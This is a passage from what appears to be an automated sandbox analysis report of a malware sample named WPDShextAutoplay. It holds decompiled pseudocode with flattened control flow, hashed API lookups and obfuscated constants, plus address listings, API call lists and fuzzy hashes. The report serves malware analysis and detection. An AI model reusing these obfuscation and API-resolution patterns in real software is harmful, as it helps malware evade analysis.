							 *_t37(_t108, 0, _t112);
							_t104 = 0x12f72f95;
							continue;
						} else {
							__eflags = _t104 - 0x128dff18;
							if(_t104 != 0x128dff18) {
								goto L40;
							} else {
								_t41 =  *0x2ae270;
								__eflags = _t41;
								if(_t41 == 0) {
									_t41 = E002A3E60(_t58, E002A3F00(0x26f5757c), 0x56e230f9, _t112);
									 *0x2ae270 = _t41;
								}
								_t42 =  *_t41(_v20,  *_t101, 1);
								__eflags = _t42;
								_v36 = _t42;
								_t104 =  !=  ? 0x26342ffd : 0x5d498c4;
								while(1) {
									_t16 = _v28;
									goto L2;
								}
							}
						}
					} else {
						if(_t116 == 0) {
							_t45 =  *0x2ae200;
							__eflags = _t45;
							if(_t45 == 0) {
								_t45 = E002A3E60(_t58, E002A3F00(0x26f5757c), 0x16d40839, _t112);
								 *0x2ae200 = _t45;
							}
							 *_t45(_v16, 1, _t112);
							goto L13;
						} else {
							if(_t104 == 0x5d498c4) {
								_t101 = _t101 + 0x2c;
								__eflags = _t101 - _t16;
								asm("sbb esi, esi");
								_t104 = (_t104 & 0x00ad60c6) + 0x11e09e52;
								goto L2;
							} else {
								if(_t104 != 0x8956eec) {
									goto L40;
								} else {
									_t112 = E002A42C0(_t58, 0x2000);
									_t104 =  !=  ? 0x254bd927 : 0x12f72f95;
									while(1) {
										_t16 = _v28;
										goto L2;
									}
								}
							}
						}
					}
					goto L54;
				}
			}









































                                                                                0x002a5047
                                                                                0x002a504b
                                                                                0x002a504d
                                                                                0x002a5051
                                                                                0x002a5053
                                                                                0x002a5057
                                                                                0x002a505c
                                                                                0x002a505c
                                                                                0x002a5060
                                                                                0x002a5060
                                                                                0x002a5060
                                                                                0x002a5066
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x002a51af
                                                                                0x002a51b5
                                                                                0x002a52f9
                                                                                0x002a52ff
                                                                                0x00000000
                                                                                0x002a5301
                                                                                0x002a5301
                                                                                0x002a5306
                                                                                0x002a5308
                                                                                0x002a531b
                                                                                0x002a5320
                                                                                0x002a5320
                                                                                0x002a5327
                                                                                0x002a532e
                                                                                0x002a5330
                                                                                0x002a5348
                                                                                0x002a5348
                                                                                0x002a5355
                                                                                0x002a5357
                                                                                0x002a5359
                                                                                0x002a535b
                                                                                0x002a535d
                                                                                0x002a505c
                                                                                0x002a505c
                                                                                0x00000000
                                                                                0x002a505c
                                                                                0x002a505c
                                                                                0x002a535b
                                                                                0x002a51bb
                                                                                0x002a51bb
                                                                                0x002a5277
                                                                                0x002a527c
                                                                                0x002a527e
                                                                                0x002a5291
                                                                                0x002a5296
                                                                                0x002a5296
                                                                                0x002a52ac
                                                                                0x002a52b0
                                                                                0x002a52b2
                                                                                0x002a52bd
                                                                                0x002a52c3
                                                                                0x002a52c5
                                                                                0x002a52d8
                                                                                0x002a52dd
                                                                                0x002a52dd
                                                                                0x002a52e6
                                                                                0x00000000
                                                                                0x002a51c1
                                                                                0x002a51c1
                                                                                0x002a51c7
                                                                                0x002a526d
                                                                                0x00000000
                                                                                0x002a51cd
                                                                                0x002a51cd
                                                                                0x002a51d3
                                                                                0x002a52e8
                                                                                0x002a52e8
                                                                                0x002a52ee
                                                                                0x002a505c
                                                                                0x002a505c
                                                                                0x00000000
                                                                                0x002a505c
                                                                                0x002a505c
                                                                                0x002a51d9
                                                                                0x002a51d9
                                                                                0x002a51de
                                                                                0x002a51e0
                                                                                0x002a51f3
                                                                                0x002a51f8
                                                                                0x002a51f8
                                                                                0x002a521b
                                                                                0x002a521d
                                                                                0x002a521f
                                                                                0x002a50ef
                                                                                0x002a50ef
                                                                                0x002a505c
                                                                                0x002a505c
                                                                                0x00000000
                                                                                0x002a505c
                                                                                0x002a5225
                                                                                0x002a5225
                                                                                0x002a522a
                                                                                0x002a522c
                                                                                0x002a523f
                                                                                0x002a5244
                                                                                0x002a5244
                                                                                0x002a5249
                                                                                0x002a524e
                                                                                0x002a525b
                                                                                0x002a525d
                                                                                0x002a525f
                                                                                0x002a5261
                                                                                0x002a5265
                                                                                0x00000000
                                                                                0x002a5265
                                                                                0x00000000
                                                                                0x002a521f
                                                                                0x002a51d3
                                                                                0x002a51c7
                                                                                0x002a51bb
                                                                                0x002a53c0
                                                                                0x002a53c0
                                                                                0x00000000
                                                                                0x002a53c0
                                                                                0x002a506c
                                                                                0x002a5367
                                                                                0x002a536c
                                                                                0x002a536e
                                                                                0x002a5381
                                                                                0x002a5386
                                                                                0x002a5386
                                                                                0x002a538d
                                                                                0x002a538f
                                                                                0x002a5394
                                                                                0x002a5396
                                                                                0x002a53a9
                                                                                0x002a53ae
                                                                                0x002a53ae
                                                                                0x00000000
                                                                                0x002a53b7
                                                                                0x002a5072
                                                                                0x002a5078
                                                                                0x002a50f9
                                                                                0x002a50ff
                                                                                0x002a5153
                                                                                0x002a5158
                                                                                0x002a515a
                                                                                0x002a516d
                                                                                0x002a5172
                                                                                0x002a5172
                                                                                0x002a5179
                                                                                0x002a517b
                                                                                0x002a5180
                                                                                0x002a5182
                                                                                0x002a5195
                                                                                0x002a519a
                                                                                0x002a519a
                                                                                0x002a51a3
                                                                                0x002a51a5
                                                                                0x00000000
                                                                                0x002a5101
                                                                                0x002a5101
                                                                                0x002a5107
                                                                                0x00000000
                                                                                0x002a510d
                                                                                0x002a510d
                                                                                0x002a5112
                                                                                0x002a5114
                                                                                0x002a5127
                                                                                0x002a512c
                                                                                0x002a512c
                                                                                0x002a5139
                                                                                0x002a513b
                                                                                0x002a513d
                                                                                0x002a514b
                                                                                0x002a505c
                                                                                0x002a505c
                                                                                0x00000000
                                                                                0x002a505c
                                                                                0x002a505c
                                                                                0x002a5107
                                                                                0x002a507a
                                                                                0x002a507a
                                                                                0x002a50c2
                                                                                0x002a50c7
                                                                                0x002a50c9
                                                                                0x002a50dc
                                                                                0x002a50e1
                                                                                0x002a50e1
                                                                                0x002a50ed
                                                                                0x00000000
                                                                                0x002a507c
                                                                                0x002a5082
                                                                                0x002a50ad
                                                                                0x002a50b0
                                                                                0x002a50b2
                                                                                0x002a50ba
                                                                                0x00000000
                                                                                0x002a5084
                                                                                0x002a508a
                                                                                0x00000000
                                                                                0x002a5090
                                                                                0x002a509a
                                                                                0x002a50a8
                                                                                0x002a505c
                                                                                0x002a505c
                                                                                0x00000000
                                                                                0x002a505c
                                                                                0x002a505c
                                                                                0x002a508a
                                                                                0x002a5082
                                                                                0x002a507a
                                                                                0x00000000
                                                                                0x002a5078

                                                                                APIs
                                                                                • RtlAllocateHeap.NTDLL(00000000,00000008,00020000,?,?,002A8AC8,?,3251FEFE,?,?), ref: 002A5355
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2287225432.00000000002A1000.00000020.00000001.sdmp, Offset: 002A0000, based on PE: true
                                                                                • Associated: 00000009.00000002.2287178032.00000000002A0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000009.00000002.2287302605.00000000002AD000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000009.00000002.2287339879.00000000002AF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_2a0000_WPDShextAutoplay.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 1279760036-0
                                                                                • Opcode ID: c46978bacf8461c206813eba88a889aed9b09a811142ac6ddb16c92cadc45775
                                                                                • Instruction ID: fd4e961c6fbc4c3de89c40410c8408d3a8fdf48aca9bc713c8dfd31ce657cfe1
                                                                                • Opcode Fuzzy Hash: c46978bacf8461c206813eba88a889aed9b09a811142ac6ddb16c92cadc45775
                                                                                • Instruction Fuzzy Hash: 4F81F532B307225BDF14EF789C9572B76DAABA7744F420429F816DB291EE708D214BC1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 002A9860, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 195serviceCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                C-Code - Quality: 73%
                                                                                			E002A9860() {
				char _v524;
				unsigned int _v528;
				char _v536;
				void* _v544;
				void* __ebx;
				void* __ebp;
				void* _t28;
				void* _t29;
				void* _t31;
				void* _t37;
				void* _t39;
				void* _t40;
				void* _t47;
				void* _t49;
				void* _t50;
				void* _t53;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t62;
				void* _t64;
				void* _t69;
				void* _t72;
				void* _t92;
				void* _t93;
				intOrPtr _t94;
				void* _t97;
				void* _t98;

				_t64 = 0;
				_t28 = 0x29f9e503;
				_t92 = _v528;
				_t2 = _t64 + 1; // 0x1
				_t94 = _t2;
				goto L1;
				do {
					while(1) {
						L1:
						_t97 = _t28 - 0x13fee53b;
						if(_t97 > 0) {
							break;
						}
						if(_t97 == 0) {
							__eflags =  *0x2ae310;
							if( *0x2ae310 == 0) {
								 *0x2ae310 = E002A3E60(_t64, E002A3F00(0x26f5757c), 0x9ba7cd1, _t94);
							}
							_t49 = OpenSCManagerW(0, 0, 0xf003f); // executed
							_t92 = _t49;
							__eflags = _t92;
							if(_t92 == 0) {
								_t28 = 0x23c48583;
							} else {
								_t50 =  *0x2ae54c; // 0x32e198
								 *((intOrPtr*)(_t50 + 0x220)) = _t94;
								_t28 = 0xc471eb;
							}
							continue;
						} else {
							_t98 = _t28 - 0x9835f84;
							if(_t98 > 0) {
								__eflags = _t28 - 0xc0f0991;
								if(_t28 != 0xc0f0991) {
									goto L36;
								} else {
									_t69 =  *0x2adbd8;
									__eflags = _t69;
									if(_t69 == 0) {
										_t69 = E002A3E60(_t64, E002A3F00(0xd9518805), 0x141622d6, _t94);
										 *0x2adbd8 = _t69;
									}
									_t53 =  *0x2ae54c; // 0x32e198
									_t56 =  *_t69(0, _v528, 0, 0, _t53 + 0x18); // executed
									__eflags = _t56;
									_t28 = 0x9835f84;
									_t64 =  ==  ? _t94 : _t64;
									continue;
								}
							} else {
								if(_t98 == 0) {
									E002A7C60(_t94);
									_t28 = 0x6addd5c;
									continue;
								} else {
									if(_t28 == 0xc471eb) {
										_v528 = 0xc1a3;
										_t28 = 0x179ed98e;
										_v528 = _v528 + 0xffff1ad7;
										_v528 = _v528 ^ 0xffffdc53;
										continue;
									} else {
										if(_t28 != 0x6addd5c) {
											goto L36;
										} else {
											_t60 =  *0x2ae3f4;
											if(_t60 == 0) {
												_t60 = E002A3E60(_t64, E002A3F00(0x9bab0b12), 0x7dc9b9bb, _t94);
												 *0x2ae3f4 = _t60;
											}
											 *_t60(0,  &_v524, 0x104);
											_t62 = E002A3D00( &_v536);
											_t72 =  *0x2ae54c; // 0x32e198
											 *((intOrPtr*)(_t72 + 0x46c)) = _t62;
											_t28 = 0x39ea8110;
											continue;
										}
									}
								}
							}
						}
						L42:
					}
					__eflags = _t28 - 0x29f9e503;
					if(__eflags > 0) {
						__eflags = _t28 - 0x39ea8110;
						if(_t28 == 0x39ea8110) {
							_t29 =  *0x2adbd8;
							__eflags = _t29;
							if(_t29 == 0) {
								_t29 = E002A3E60(_t64, E002A3F00(0xd9518805), 0x141622d6, _t94);
								 *0x2adbd8 = _t29;
							}
							 *_t29(0, 0x25, 0, 0,  &_v524);
							_t31 =  *0x2ae54c; // 0x32e198
							_t32 = _t31 + 0x234;
							__eflags = _t31 + 0x234;
							E002A3040(_t32);
							goto L41;
						} else {
							goto L36;
						}
					} else {
						if(__eflags == 0) {
							_t37 =  *0x2ae494;
							__eflags = _t37;
							if(_t37 == 0) {
								_t37 = E002A3E60(_t64, E002A3F00(0x9bab0b12), 0x7facde30, _t94);
								 *0x2ae494 = _t37;
							}
							_t93 =  *_t37();
							_t39 =  *0x2add18;
							__eflags = _t39;
							if(_t39 == 0) {
								_t39 = E002A3E60(_t64, E002A3F00(0x9bab0b12), 0x9ff0609c, _t94);
								 *0x2add18 = _t39;
							}
							_t40 =  *_t39(_t93, 8, 0x480);
							 *0x2ae54c = _t40;
							__eflags = _t40;
							if(_t40 == 0) {
								L41:
								return _t64;
							} else {
								 *((intOrPtr*)(_t40 + 4)) = E002A7E40;
								_t28 = 0x13fee53b;
								goto L1;
							}
						} else {
							__eflags = _t28 - 0x179ed98e;
							if(_t28 == 0x179ed98e) {
								__eflags =  *0x2ae18c;
								if( *0x2ae18c == 0) {
									 *0x2ae18c = E002A3E60(_t64, E002A3F00(0x26f5757c), 0x268fe5f0, _t94);
								}
								CloseServiceHandle(_t92); // executed
								_t28 = 0xc0f0991;
								goto L1;
							} else {
								__eflags = _t28 - 0x23c48583;
								if(_t28 != 0x23c48583) {
									goto L36;
								} else {
									_v528 = 0x5332;
									_v528 = _v528 << 6;
									_v528 = _v528 >> 0xf;
									_v528 = _v528 + 0xffffb18f;
									_v528 = _v528 >> 3;
									_v528 = _v528 ^ 0x1ffff62b;
									_t47 =  *0x2ae54c; // 0x32e198
									 *((intOrPtr*)(_t47 + 8)) = 0x2a7e30;
									_t28 = 0xc0f0991;
									goto L1;
								}
							}
						}
					}
					goto L42;
					L36:
					__eflags = _t28 - 0x305b3459;
				} while (_t28 != 0x305b3459);
				return _t64;
				goto L42;
			}






























                                                                                0x002a9868
                                                                                0x002a986a
                                                                                0x002a9871
                                                                                0x002a9875
                                                                                0x002a9875
                                                                                0x002a9878
                                                                                0x002a9880
                                                                                0x002a9880
                                                                                0x002a9880
                                                                                0x002a9880
                                                                                0x002a9885
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x002a988b
                                                                                0x002a9993
                                                                                0x002a9995
                                                                                0x002a99ad
                                                                                0x002a99ad
                                                                                0x002a99bb
                                                                                0x002a99bd
                                                                                0x002a99bf
                                                                                0x002a99c1
                                                                                0x002a99d8
                                                                                0x002a99c3
                                                                                0x002a99c3
                                                                                0x002a99c8
                                                                                0x002a99ce
                                                                                0x002a99ce
                                                                                0x00000000
                                                                                0x002a9891
                                                                                0x002a9891
                                                                                0x002a9896
                                                                                0x002a9936
                                                                                0x002a993b
                                                                                0x00000000
                                                                                0x002a9941
                                                                                0x002a9941
                                                                                0x002a9947
                                                                                0x002a9949
                                                                                0x002a9961
                                                                                0x002a9963
                                                                                0x002a9963
                                                                                0x002a9969
                                                                                0x002a997d
                                                                                0x002a997f
                                                                                0x002a9981
                                                                                0x002a9986
                                                                                0x00000000
                                                                                0x002a9986
                                                                                0x002a989c
                                                                                0x002a989c
                                                                                0x002a9927
                                                                                0x002a992c
                                                                                0x00000000
                                                                                0x002a98a2
                                                                                0x002a98a7
                                                                                0x002a9905
                                                                                0x002a990d
                                                                                0x002a9912
                                                                                0x002a991a
                                                                                0x00000000
                                                                                0x002a98a9
                                                                                0x002a98ae
                                                                                0x00000000
                                                                                0x002a98b4
                                                                                0x002a98b4
                                                                                0x002a98bb
                                                                                0x002a98ce
                                                                                0x002a98d3
                                                                                0x002a98d3
                                                                                0x002a98e4
                                                                                0x002a98ea
                                                                                0x002a98ef
                                                                                0x002a98f5
                                                                                0x002a98fb
                                                                                0x00000000
                                                                                0x002a98fb
                                                                                0x002a98ae
                                                                                0x002a98a7
                                                                                0x002a989c
                                                                                0x002a9896
                                                                                0x00000000
                                                                                0x002a988b
                                                                                0x002a99e2
                                                                                0x002a99e7
                                                                                0x002a9ae3
                                                                                0x002a9ae8
                                                                                0x002a9b02
                                                                                0x002a9b07
                                                                                0x002a9b09
                                                                                0x002a9b1c
                                                                                0x002a9b21
                                                                                0x002a9b21
                                                                                0x002a9b33
                                                                                0x002a9b35
                                                                                0x002a9b3e
                                                                                0x002a9b3e
                                                                                0x002a9b44
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x002a99ed
                                                                                0x002a99ed
                                                                                0x002a9a73
                                                                                0x002a9a78
                                                                                0x002a9a7a
                                                                                0x002a9a8d
                                                                                0x002a9a92
                                                                                0x002a9a92
                                                                                0x002a9a99
                                                                                0x002a9a9b
                                                                                0x002a9aa0
                                                                                0x002a9aa2
                                                                                0x002a9ab5
                                                                                0x002a9aba
                                                                                0x002a9aba
                                                                                0x002a9ac7
                                                                                0x002a9ac9
                                                                                0x002a9ace
                                                                                0x002a9ad0
                                                                                0x002a9b4f
                                                                                0x002a9b58
                                                                                0x002a9ad2
                                                                                0x002a9ad2
                                                                                0x002a9ad9
                                                                                0x00000000
                                                                                0x002a9ad9
                                                                                0x002a99f3
                                                                                0x002a99f3
                                                                                0x002a99f8
                                                                                0x002a9a47
                                                                                0x002a9a49
                                                                                0x002a9a61
                                                                                0x002a9a61
                                                                                0x002a9a67
                                                                                0x002a9a69
                                                                                0x00000000
                                                                                0x002a99fa
                                                                                0x002a99fa
                                                                                0x002a99ff
                                                                                0x00000000
                                                                                0x002a9a05
                                                                                0x002a9a05
                                                                                0x002a9a0d
                                                                                0x002a9a12
                                                                                0x002a9a17
                                                                                0x002a9a1f
                                                                                0x002a9a24
                                                                                0x002a9a2c
                                                                                0x002a9a31
                                                                                0x002a9a38
                                                                                0x00000000
                                                                                0x002a9a38
                                                                                0x002a99ff
                                                                                0x002a99f8
                                                                                0x002a99ed
                                                                                0x00000000
                                                                                0x002a9aea
                                                                                0x002a9aea
                                                                                0x002a9aea
                                                                                0x002a9b01
                                                                                0x00000000

                                                                                APIs
                                                                                • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,0032E180), ref: 002A997D
                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 002A99BB
                                                                                • CloseServiceHandle.ADVAPI32(?,?,3251FEFE,?,?), ref: 002A9A67
                                                                                • SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?,?,3251FEFE,?,?), ref: 002A9B33
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2287225432.00000000002A1000.00000020.00000001.sdmp, Offset: 002A0000, based on PE: true
                                                                                • Associated: 00000009.00000002.2287178032.00000000002A0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000009.00000002.2287302605.00000000002AD000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000009.00000002.2287339879.00000000002AF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_2a0000_WPDShextAutoplay.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FolderPath$CloseHandleManagerOpenService
                                                                                • String ID: 2S$Y4[0
                                                                                • API String ID: 2382770032-4131004879
                                                                                • Opcode ID: 2e18185cd3154a5dd61c86cb8db0e15c2381114c22b56ebca087251d8c8639f7
                                                                                • Instruction ID: 1fe3f89c0f729bd0902fe92822323e5fb52e366d9226211694bd44ecce7f8a24
                                                                                • Opcode Fuzzy Hash: 2e18185cd3154a5dd61c86cb8db0e15c2381114c22b56ebca087251d8c8639f7
                                                                                • Instruction Fuzzy Hash: A961F930B243025BDB14EF69AC8976A7395DBA3708F10441DF146DB251EE70CD558BA2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 002A8400, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 172fileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 105 2a8400-2a84df 106 2a84e3-2a84e9 105->106 107 2a85c8-2a85ce 106->107 108 2a84ef 106->108 109 2a8630-2a8637 107->109 110 2a85d0-2a85d6 107->110 111 2a866c-2a86b4 call 2ab6e0 108->111 112 2a84f5-2a84fb 108->112 118 2a8639-2a864f call 2a3f00 call 2a3e60 109->118 119 2a8654-2a8667 109->119 113 2a85d8-2a85e0 110->113 114 2a85b1-2a85b7 110->114 120 2a85bd-2a85c7 111->120 133 2a86ba 111->133 115 2a854a-2a8551 112->115 116 2a84fd-2a8503 112->116 123 2a85e2-2a85fa call 2a3f00 call 2a3e60 113->123 124 2a8600-2a8624 CreateFileW 113->124 114->106 114->120 121 2a856e-2a8591 115->121 122 2a8553-2a8569 call 2a3f00 call 2a3e60 115->122 125 2a8543-2a8548 116->125 126 2a8505-2a850b 116->126 118->119 119->106 148 2a85ae 121->148 149 2a8593-2a85a9 call 2a3f00 call 2a3e60 121->149 122->121 123->124 124->120 134 2a8626-2a862b 124->134 125->106 126->114 132 2a8511-2a8518 126->132 139 2a851a-2a8530 call 2a3f00 call 2a3e60 132->139 140 2a8535-2a8541 132->140 142 2a86bc-2a86be 133->142 143 2a86c4-2a86d1 133->143 134->106 139->140 140->106 142->120 142->143 148->114 149->148
                                                                                C-Code - Quality: 66%
                                                                                			E002A8400(void* __ebx, void* __ebp) {
				short _v524;
				char _v564;
				char _v572;
				struct _SECURITY_ATTRIBUTES* _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				intOrPtr _v596;
				intOrPtr* _t75;
				intOrPtr* _t82;
				intOrPtr* _t85;
				void* _t92;
				intOrPtr* _t93;
				void* _t95;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t100;
				void* _t101;
				signed int _t119;
				void* _t121;
				void* _t122;
				signed int _t123;
				intOrPtr _t124;
				void* _t126;
				void* _t129;

				_t126 = __ebp;
				_t101 = __ebx;
				_v584 = 0xdbec;
				_v584 = _v584 + 0xa437;
				_v584 = _v584 | 0x0afcf5fb;
				_v584 = _v584 ^ 0x9493ba05;
				_v584 = _v584 >> 0xc;
				_v584 = _v584 >> 0xb;
				_v584 = _v584 ^ 0x000001bc;
				_v592 = 0x7d19;
				_v592 = _v592 << 9;
				_v592 = _v592 >> 0xe;
				_v592 = _v592 + 0xffff07e5;
				_v592 = _v592 | 0x8aea6eef;
				_v592 = _v592 + 0xd867;
				_v592 = _v592 + 0x9c41;
				_v592 = _v592 + 0x3de0;
				_v592 = _v592 + 0x218b;
				_v592 = _v592 ^ 0x00014403;
				_v588 = 0x2591;
				_t123 = 0x4a20241;
				_v588 = _v588 * 0x7d;
				_v588 = _v588 + 0x8d68;
				_v588 = _v588 + 0xffff8911;
				_v588 = _v588 * 0x6a;
				_v588 = _v588 + 0xffff93d5;
				_v588 = _v588 ^ 0x07a13cd2;
				_v580 = 0x789;
				_v580 = _v580 >> 1;
				_v580 = _v580 ^ 0xaee58af2;
				_v580 = _v580 ^ 0xaee58936;
				_t122 = _v580;
				goto L1;
				do {
					while(1) {
						L1:
						_t129 = _t123 - 0x1aed34c4;
						if(_t129 > 0) {
							break;
						}
						if(_t129 == 0) {
							_v580 = 0xa8c00;
							_v576 = 0;
							_v596 = E002AB6E0(_v580, _v576, 0x989680, 0);
							_v592 = _t119;
							_t121 = _v588 - _v564;
							_t124 = _v596;
							asm("sbb ecx, [esp+0x3c]");
							__eflags = _v584 - _v592;
							if(__eflags < 0) {
								goto L16;
							} else {
								if(__eflags > 0) {
									L29:
									return 1;
								} else {
									__eflags = _t121 - _t124;
									if(_t121 < _t124) {
										goto L16;
									} else {
										goto L29;
									}
								}
							}
						} else {
							if(_t123 == 0x12f5064) {
								_t82 =  *0x2adec0;
								__eflags = _t82;
								if(_t82 == 0) {
									_t99 = E002A3F00(0x9bab0b12);
									_t119 = 0x8b0c7279;
									_t82 = E002A3E60(_t101, _t99, 0x8b0c7279, _t126);
									 *0x2adec0 = _t82;
								}
								 *_t82(_t122, 0,  &_v564, 0x28);
								asm("sbb esi, esi");
								_t85 =  *0x2ade3c;
								_t123 = (_t123 & 0xf96a5287) + 0x13ef6fdf;
								__eflags = _t85;
								if(_t85 == 0) {
									_t98 = E002A3F00(0x9bab0b12);
									_t119 = 0x20de7595;
									_t85 = E002A3E60(_t101, _t98, 0x20de7595, _t126);
									 *0x2ade3c = _t85;
								}
								 *_t85(_t122);
								goto L15;
							} else {
								if(_t123 == 0x4a20241) {
									_t123 = 0x33602029;
									continue;
								} else {
									if(_t123 != 0xd59c266) {
										goto L15;
									} else {
										_t93 =  *0x2ae1d4;
										if(_t93 == 0) {
											_t97 = E002A3F00(0x9bab0b12);
											_t119 = 0xa229df38;
											_t93 = E002A3E60(_t101, _t97, 0xa229df38, _t126);
											 *0x2ae1d4 = _t93;
										}
										 *_t93( &_v572);
										_t123 = 0x1aed34c4;
										continue;
									}
								}
							}
						}
						L30:
					}
					__eflags = _t123 - 0x33602029;
					if(_t123 == 0x33602029) {
						_t75 =  *0x2ae3f4;
						__eflags = _t75;
						if(_t75 == 0) {
							_t100 = E002A3F00(0x9bab0b12);
							_t119 = 0x7dc9b9bb;
							_t75 = E002A3E60(_t101, _t100, 0x7dc9b9bb, _t126);
							 *0x2ae3f4 = _t75;
						}
						 *_t75(0,  &_v524, 0x104);
						_t123 = 0x3ae77736;
						goto L1;
					} else {
						__eflags = _t123 - 0x3ae77736;
						if(_t123 != 0x3ae77736) {
							goto L15;
						} else {
							__eflags =  *0x2ade04;
							if( *0x2ade04 == 0) {
								_t95 = E002A3F00(0x9bab0b12);
								_t119 = 0xb66d748a;
								 *0x2ade04 = E002A3E60(_t101, _t95, 0xb66d748a, _t126);
							}
							_t92 = CreateFileW( &_v524, _v584, _v592, 0, _v588, _v580, 0); // executed
							_t122 = _t92;
							__eflags = _t122 - 0xffffffff;
							if(_t122 == 0xffffffff) {
								break;
							} else {
								_t123 = 0x12f5064;
								goto L1;
							}
						}
					}
					goto L30;
					L15:
					__eflags = _t123 - 0x13ef6fdf;
				} while (_t123 != 0x13ef6fdf);
				L16:
				__eflags = 0;
				return 0;
				goto L30;
			}






























                                                                                0x002a8400
                                                                                0x002a8400
                                                                                0x002a8406
                                                                                0x002a840e
                                                                                0x002a8416
                                                                                0x002a841e
                                                                                0x002a8426
                                                                                0x002a842b
                                                                                0x002a8430
                                                                                0x002a8438
                                                                                0x002a8440
                                                                                0x002a8445
                                                                                0x002a844a
                                                                                0x002a8452
                                                                                0x002a845a
                                                                                0x002a8462
                                                                                0x002a846a
                                                                                0x002a8472
                                                                                0x002a847a
                                                                                0x002a8482
                                                                                0x002a8491
                                                                                0x002a8496
                                                                                0x002a849a
                                                                                0x002a84a2
                                                                                0x002a84af
                                                                                0x002a84b3
                                                                                0x002a84bb
                                                                                0x002a84c3
                                                                                0x002a84cb
                                                                                0x002a84cf
                                                                                0x002a84d7
                                                                                0x002a84df
                                                                                0x002a84df
                                                                                0x002a84e3
                                                                                0x002a84e3
                                                                                0x002a84e3
                                                                                0x002a84e3
                                                                                0x002a84e9
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x002a84ef
                                                                                0x002a866e
                                                                                0x002a8676
                                                                                0x002a8696
                                                                                0x002a869a
                                                                                0x002a86a2
                                                                                0x002a86a6
                                                                                0x002a86aa
                                                                                0x002a86b2
                                                                                0x002a86b4
                                                                                0x00000000
                                                                                0x002a86ba
                                                                                0x002a86ba
                                                                                0x002a86c5
                                                                                0x002a86d1
                                                                                0x002a86bc
                                                                                0x002a86bc
                                                                                0x002a86be
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x002a86be
                                                                                0x002a86ba
                                                                                0x002a84f5
                                                                                0x002a84fb
                                                                                0x002a854a
                                                                                0x002a854f
                                                                                0x002a8551
                                                                                0x002a8558
                                                                                0x002a855d
                                                                                0x002a8564
                                                                                0x002a8569
                                                                                0x002a8569
                                                                                0x002a8578
                                                                                0x002a857c
                                                                                0x002a857e
                                                                                0x002a8589
                                                                                0x002a858f
                                                                                0x002a8591
                                                                                0x002a8598
                                                                                0x002a859d
                                                                                0x002a85a4
                                                                                0x002a85a9
                                                                                0x002a85a9
                                                                                0x002a85af
                                                                                0x00000000
                                                                                0x002a84fd
                                                                                0x002a8503
                                                                                0x002a8543
                                                                                0x00000000
                                                                                0x002a8505
                                                                                0x002a850b
                                                                                0x00000000
                                                                                0x002a8511
                                                                                0x002a8511
                                                                                0x002a8518
                                                                                0x002a851f
                                                                                0x002a8524
                                                                                0x002a852b
                                                                                0x002a8530
                                                                                0x002a8530
                                                                                0x002a853a
                                                                                0x002a853c
                                                                                0x00000000
                                                                                0x002a853c
                                                                                0x002a850b
                                                                                0x002a8503
                                                                                0x002a84fb
                                                                                0x00000000
                                                                                0x002a84ef
                                                                                0x002a85c8
                                                                                0x002a85ce
                                                                                0x002a8630
                                                                                0x002a8635
                                                                                0x002a8637
                                                                                0x002a863e
                                                                                0x002a8643
                                                                                0x002a864a
                                                                                0x002a864f
                                                                                0x002a864f
                                                                                0x002a8660
                                                                                0x002a8662
                                                                                0x00000000
                                                                                0x002a85d0
                                                                                0x002a85d0
                                                                                0x002a85d6
                                                                                0x00000000
                                                                                0x002a85d8
                                                                                0x002a85de
                                                                                0x002a85e0
                                                                                0x002a85e7
                                                                                0x002a85ec
                                                                                0x002a85fa
                                                                                0x002a85fa
                                                                                0x002a861d
                                                                                0x002a861f
                                                                                0x002a8621
                                                                                0x002a8624
                                                                                0x00000000
                                                                                0x002a8626
                                                                                0x002a8626
                                                                                0x00000000
                                                                                0x002a8626
                                                                                0x002a8624
                                                                                0x002a85d6
                                                                                0x00000000
                                                                                0x002a85b1
                                                                                0x002a85b1
                                                                                0x002a85b1
                                                                                0x002a85bd
                                                                                0x002a85bd
                                                                                0x002a85c7
                                                                                0x00000000

                                                                                APIs
                                                                                • CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,?,3251FEFE), ref: 002A861D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2287225432.00000000002A1000.00000020.00000001.sdmp, Offset: 002A0000, based on PE: true
                                                                                • Associated: 00000009.00000002.2287178032.00000000002A0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000009.00000002.2287302605.00000000002AD000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000009.00000002.2287339879.00000000002AF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
